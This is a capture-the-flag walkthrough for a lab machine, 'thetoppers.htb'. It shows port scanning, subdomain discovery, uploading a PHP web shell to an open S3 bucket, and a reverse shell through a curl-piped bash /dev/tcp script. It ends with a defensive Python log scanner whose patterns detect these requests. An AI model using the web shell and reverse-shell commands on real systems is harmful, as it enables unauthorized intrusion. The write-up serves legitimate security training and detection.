First things first: a port scan. Replace ip with the machine's IP address.
sudo nmap -sV ip
Relevant output:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
By pasting the IP address into a browser, a website loads. However, if we try to open the site via the URL "thetoppers.htb", which can be found on the CONTACT page (mail@thetoppers.htb), it will not load. So we modify our local hosts file:
sudo nano /etc/hosts
After the 127... entries, add your machine's IP address and the hostname "thetoppers.htb", so the file looks like this:
127.0.0.1 localhost
127.0.1.1 kali
ip        thetoppers.htb
...
Then hit Ctrl+O and Enter to save the changes, and Ctrl+X to close the editor.
Now, when we paste "thetoppers.htb" into the browser, it still won't work: we need to prefix it with "http://". The working URL is
http://thetoppers.htb
Let's now search for available subdomains with Gobuster.
If you don't have the following wordlist installed yet, run
sudo apt install seclists
Then you can search for subdomains:
sudo gobuster vhost -u http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
The "--append-domain" flag is crucial if you use Gobuster v3.2 or above! The relevant result is:
Found: s3.thetoppers.htb Status: 404 [Size: 21]
Let's also add this to the hosts file, like we did before. The hosts file now looks something like this:
127.0.0.1 localhost
127.0.1.1 kali
ip        thetoppers.htb
ip        s3.thetoppers.htb
We can confirm that everything works so far by pasting "http://s3.thetoppers.htb" into the browser. The result should be:
{"status": "running"}
Now it's time to install the AWS CLI and connect to the s3 bucket.
sudo apt install awscli
Then we need to configure the AWS CLI:
aws configure
and type in any string. It does not matter what, because those keys are not actually checked. I used "temp".
Let's list any s3 bucket available:
aws --endpoint=http://s3.thetoppers.htb s3 ls
Expected output:
2023-05-21 02:40:47 thetoppers.htb
Let's list the content of the s3 bucket:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
Expected output:
                           PRE images/
2023-05-21 02:40:47          0 .htaccess
2023-05-21 02:40:47      11952 index.php
Let's create a local shell.php file with the following content:
<?php system($_GET["cmd"]); ?>
Now we will upload this script to the s3 bucket.
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Expected output:
upload: ./shell.php to s3://thetoppers.htb/shell.php
To confirm it's uploaded, run this command again:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
The shell.php file should be listed there. We can also go to our browser and open this URL:
http://thetoppers.htb/shell.php?cmd=id
Expected output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Finally, we can get the reverse shell. Let's look up the inet IP of tun0:
ifconfig tun0
The relevant output is (ip being the IP address you need):
inet ip
Create a local shell.sh file and paste in the following content, replacing ip with your ifconfig tun0 inet IP value:
#!/bin/bash
sh -i >& /dev/tcp/ip/443 0>&1
Then start listening on port 443 (more stealthy than port 1337) with nc:
sudo nc -lvnp 443
Expected output:
listening on [any] 443 ...
In a new terminal window, start a web server to host our reverse shell script:
python3 -m http.server 8080
Expected output:
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Now, paste this URL into your browser (replace ip with the IP address you got from "ifconfig tun0"):
http://thetoppers.htb/shell.php?cmd=curl%20ip:8080/shell.sh|bash
In the nc terminal window, new output should appear, including something like this:
connect to [10.10.14.131] from (UNKNOWN) [10.129.133.141] 39378
sh: 0: can't access tty; job control turned off
Verify the shell by running
id
The terminal output should be
uid=33(www-data) gid=33(www-data) groups=33(www-data)
So, it works! Let's get the flag. Type in
cd ..
to move up to the directory /var/www. Then run
cat flag.txt
to print the flag!
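From the defender's side, the whole chain above leaves two artefacts in the Apache access log: requests to a PHP file that was never part of the deployed site (the bucket listing shows only index.php), and a "cmd"-style query parameter carrying shell syntax. The following Python script is an added example, not part of the original walkthrough; it assumes Apache's combined log format, takes index.php as the only legitimate PHP entrypoint, and uses constructed log lines that mirror the requests made above (10.10.14.131 as the client address comes from the nc output).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log line: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')

# PHP entrypoints the site legitimately serves (assumed from the bucket listing: only index.php).
KNOWN_PHP = {"/index.php"}

# Parameter names web shells read the command from, and values that are shell syntax.
SUSPECT_PARAMS = {"cmd", "exec", "command", "c"}
SUSPECT_PATTERNS = [
    re.compile(r"/dev/tcp/"),                               # bash network redirection
    re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"),    # fetch-and-pipe-to-shell
    re.compile(r"\b(id|whoami|uname|nc|ncat|bash -i)\b"),   # typical first commands
]

def classify_request(target: str) -> list[str]:
    """Return the reasons a request target looks like web-shell traffic ([] if clean)."""
    parts = urlsplit(target)
    reasons = []
    if parts.path.endswith(".php") and parts.path not in KNOWN_PHP:
        reasons.append(f"unexpected PHP entrypoint {parts.path}")
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in SUSPECT_PARAMS:
            reasons.append(f"command-style parameter '{name}'")
        for value in values:  # parse_qs has already percent-decoded the value
            if any(p.search(value) for p in SUSPECT_PATTERNS):
                reasons.append(f"shell pattern in '{name}': {value!r}")
    return reasons

def scan_log(lines):
    """Yield (client_ip, path, reasons) for every log line that trips a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and (reasons := classify_request(m["target"])):
            yield m["ip"], urlsplit(m["target"]).path, reasons

# Constructed sample log mirroring the requests made in this walkthrough.
SAMPLE_LOG = [
    '10.10.14.131 - - [21/May/2023:02:45:10 +0000] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"',
    '10.10.14.131 - - [21/May/2023:02:46:02 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '10.10.14.131 - - [21/May/2023:02:47:30 +0000] "GET /shell.php?cmd=curl%2010.10.14.131:8080/shell.sh|bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.131 - - [21/May/2023:02:48:00 +0000] "GET /images/band.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}: {'; '.join(reasons)}")
```

The allowlist check is the one that catches the upload itself, regardless of what the attacker later puts in the query string; the pattern rules only add context once the shell is used.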